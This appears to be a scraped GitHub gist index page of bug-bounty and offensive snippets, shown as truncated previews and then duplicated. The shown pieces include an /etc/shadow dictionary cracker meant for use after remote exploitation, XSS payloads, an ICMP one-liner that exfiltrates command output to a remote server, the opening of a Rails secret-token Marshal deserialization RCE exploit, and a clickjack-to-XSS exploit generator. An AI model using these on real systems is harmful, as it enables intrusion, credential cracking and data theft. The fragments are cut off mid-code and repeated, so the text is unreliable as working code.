Arbaz Hussain arbazkiraak

## shadowcracker.py
#/etc/shadow Bruteforcer
#Coded by Aaditya Purani
#Just for Fun after Remote Exploitation
#It will crack shadow password by Dictionary attack

import optparse
import crypt

def checkPass(cryptPass, dname):
	salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]

## reconme.txt

alias reconme='function frecon()
{
         mkdir $1
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
         mv report.html $1/report-$1.html
         sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
         chown -R www-data:www-data /var/www/html/recon
         touch /var/www/html/recon/$1/index.html

## api-linkfinder.sh
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt

## test.html
<html>
<head></head>
<body>

<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>

## icmp.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              26 stars
            
          
                jobertabma
                / icmp.md
            
            
              Last active
              September 14, 2022 15:02
            
              
                Commands to exfiltrate command output via ICMP packet size
              
          
Capture ICMP packets on your server:

tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap


Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:

ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done


## rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

## gist:3628941
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*

## foxyproxyBB.json
{
  "84kr3q1592995213323": {
    "type": 1,
    "color": "#cc883a",
    "title": "Burp",
    "active": true,
    "address": "127.0.0.1",
    "port": 8080,
    "proxyDNS": false,
    "username": "",

## cxp.py
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code

fo=open('exploit.html','w') #creating html file

source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)

## bb-foxyproxy-pattern.json
{
	"30523382": {
		"className": "Proxy",
		"data": {
			"bypassFPForPAC": true,
			"color": "#f57575",
			"configUrl": "",
			"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
			"cycle": false,
			"enabled": true,
	#/etc/shadow Bruteforcer
	#Coded by Aaditya Purani
	#Just for Fun after Remote Exploitation
	#It will crack shadow password by Dictionary attack

	import optparse
	import crypt

	def checkPass(cryptPass, dname):
	salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]

	alias reconme='function frecon()
	{
	mkdir $1
	$HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
	$HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
	mv report.html $1/report-$1.html
	sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
	chown -R www-data:www-data /var/www/html/recon
	touch /var/www/html/recon/$1/index.html
	wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
	echo https://stripe.com/docs/api \| hakrawler -t 500 -d 10 \|nuclei -t ./linkfinder.yaml -o api.txt
	cat api.txt \|grep url_params \|cut -d ' ' -f 7 \|tr , '\n' \| tr ] '\n' \| tr [ '\n' \|tr -d '"' \|tr -d "'" \|sort -u > api_params.txt
	cat api.txt \|grep relative_links \|cut -d ' ' -f 7 \|tr , '\n' \| tr ] '\n' \| tr [ '\n' \|tr -d '"' \|tr -d "'" \|sort -u > api_link_finder.txt
	<html>
	<head></head>
	<body>

	<a href="javascript: alert('clicked xss link')" id="link">click me</a>
	<img src="xx" onerror="alert('xss')" />
	</body>
	</html>
	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +
	{
	"84kr3q1592995213323": {
	"type": 1,
	"color": "#cc883a",
	"title": "Burp",
	"active": true,
	"address": "127.0.0.1",
	"port": 8080,
	"proxyDNS": false,
	"username": "",
	print "Clickjack to Xss"
	vector=raw_input('xss vector--> ') #xss payload
	html=raw_input('Custom Iframe Code--> ') #custom iframe code

	fo=open('exploit.html','w') #creating html file

	source_code="""<html><body>
	<h1>Clickjack to exploit self xss </h1>
	<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
	"""%(vector)
	{
	"30523382": {
	"className": "Proxy",
	"data": {
	"bypassFPForPAC": true,
	"color": "#f57575",
	"configUrl": "",
	"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
	"cycle": false,
	"enabled": true,